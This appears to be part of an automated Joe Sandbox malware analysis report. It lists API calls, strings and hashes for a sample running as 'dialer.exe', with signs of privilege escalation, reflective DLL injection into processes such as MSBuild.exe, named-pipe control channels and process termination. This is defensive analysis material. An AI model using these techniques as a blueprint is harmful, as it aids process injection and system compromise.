                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 4f2f5e27246206eea56d69c412b8d0279ed71c7f2e8b6425a9b5b4536880f7d5
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 9A517F3A105280CAEB64CB26D56835877A0FF55F94F18C225DE9987BD6CF39D672CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 5efba598371f3164d5c269a6dd6e3b14d3005976408686a2b30e5cf693d1dc77
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 0F51BF3A7036008AEB14CB15E668B1937A6FB54FA8F58C174DE064378AEF35CA63C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 9f5793f7d0de699efc5533be273cbdb4f095eb45e2e66b69fd8bd05b7d6f41b1
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: CB31AB3A202640C6E714DF12E968B1937A5FB44FE8F59C064EE5A0378ADF39CA63C704
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: ef1fbaafced2506ef859b809f846c958e5abc1253f6c18c8ab5c15a880b2df03
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: DCD10436706A8089EB51CFF9D45439C3BB1FB65B98F108225CE5997B9ADE34CA27C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: bca7a7537413a814024c18e74fad7fd988dc4860cfb6eff8150520532d3ea991
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: E101803A502F91C6DB04DFA2E81815A63A0FB49F81F058035DF5943725DF34C562C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: dc989ce590924e645d5388a2195a7d2d74917cf09d83041b89717d64de52fe04
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: E991093670265095FFA0DFE594683AD3BA0BB66F88F148229DE0A57685DF34CE63C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: dea16539f3025a33b20a8d24ec1f8733f5a989418c8bfd37371a2de8c3ac8ab8
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: 45113326711F0589EF40CFA0E8693A833A4F719B58F440D31DE6D47794DF78C6A58380
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: bd14db6195d5791528c6a8e5356023968551f1e599348ad060c522a7f8a2eed5
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: 6471063A20978145E7B4DF25E8683AE6790FBA5F84F858136DE0953B89DE34C752C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 51b4e0f25df2e595eab0c30582cae3810a8148ec4eb02d9f0615e9b7bf5494d6
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 06618F3B606B448AEB20DF65D45439D7BA0FB48F88F048225EF4917B9ADF38D266C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: 19fc3e2ca2e19138768e866d6378d2217a07a0f3910f03fc46d9ba3512f0dfde
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: 4051273A60E38181E6B4DE29A07C3BE6751FBA5F80F858135DE4903B5ACE39C766C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: 3b0d6dddc5cda5e1bd1b352df7cd7797e84a2228af3517d70ae7b287450ec1cf
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: CE41A336716A8086DB60CFA5F8583AA77A0FB99B94F448131EE4D87794DF3CCA52C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: 5579d35dcaf91ad1cd0ca791ae9fd9cc4e12dcf6ed5a46996f24cb29e10fdbd9
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: B011FB36219B8082EB61CB15E45435977E5FB88F94F588225EE8D47B69DF3CCA62CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: b8c83cca01c4564f0c871dc0f54677a3b79baeb8a7858315c295f9fe351a1ccf
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 4BE08661641B44D0DF01CF21E85429833A0EF58F64B58D1329D5C46351FE38D2FAC300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: 56eea4608479d4b951214e51dd6120cc5c41e6183e581f993db96d2a5a1d3e31
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: E1E0E665651B44D4DF01CF61D4541987365FB58F64B98D132DD5C46355FE38D2F6C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 307d70f52149b1f595fd0f8130877afef073a5c5cfe590f8f49550f0d4e01082
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: 3D118C29606F8581EA44DB66A86826973A1FF89FC0F188038DE4D43766DF38C963C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: bc8b4917df651573b7cb4e9393ba346fec3d33987c72220a69f65ad094d59ab8
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: 30E06D39602A0586EB44CFA2D82C36A36E1FF89F06F04C024CD1907751DF7DC9AAC750

                                                                      Execution Graph

                                                                      Execution Coverage: 48.5%
                                                                      Dynamic/Decrypted Code Coverage: 0%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 226
                                                                      Total number of Limit Nodes: 22

                                                                      Callgraph

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                      • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                      • API String ID: 4177739653-1130149537
                                                                      • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                      • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                      • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                      • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                      • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                      • API String ID: 2561231171-3753927220
                                                                      • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                      • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                      • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                      • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                      • String ID:
                                                                      • API String ID: 4084875642-0
                                                                      • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                      • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                      • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                      • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                      • String ID: .text$C:\Windows\System32\
                                                                      • API String ID: 2721474350-832442975
                                                                      • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                      • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                      • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                      • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                      • String ID: M$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2203880229-3489460547

                                                                      Control-flow Graph

                                                                      [Control-flow graph of the function at 1400021d0: after a call to 140001b54 it loops over Sleep, ConnectNamedPipe, ReadFile and DisconnectNamedPipe; node dump omitted]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                      • API String ID: 2071455217-3440882674

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 3197395349-0

                                                                      Control-flow Graph

                                                                      [Control-flow graph of the function at 140002b38: GetProcessHeap/HeapAlloc twice, then a loop over K32EnumProcesses, a per-process call to 140002540, and SleepEx; node dump omitted]
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                      • String ID:
                                                                      • API String ID: 3676546796-0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                      • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                        • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                        • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                        • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                        • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                        • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                        • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                        • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                      • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                      • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                                      • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                      • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                      • String ID:
                                                                      • API String ID: 1323846700-0

                                                                      Control-flow Graph

                                                                      [Control-flow graph of the function at 1400018ac: OpenProcess, IsWow64Process, CloseHandle; node dump omitted]
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandleOpenWow64
                                                                      • String ID:
                                                                      • API String ID: 10462204-0

                                                                      Control-flow Graph

                                                                      [Control-flow graph of the function at 140002258: a call to 14000226c followed by ExitProcess; node dump omitted]
                                                                      APIs
                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                        • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                        • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                        • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                        • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                        • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                        • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                        • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                        • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                        • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
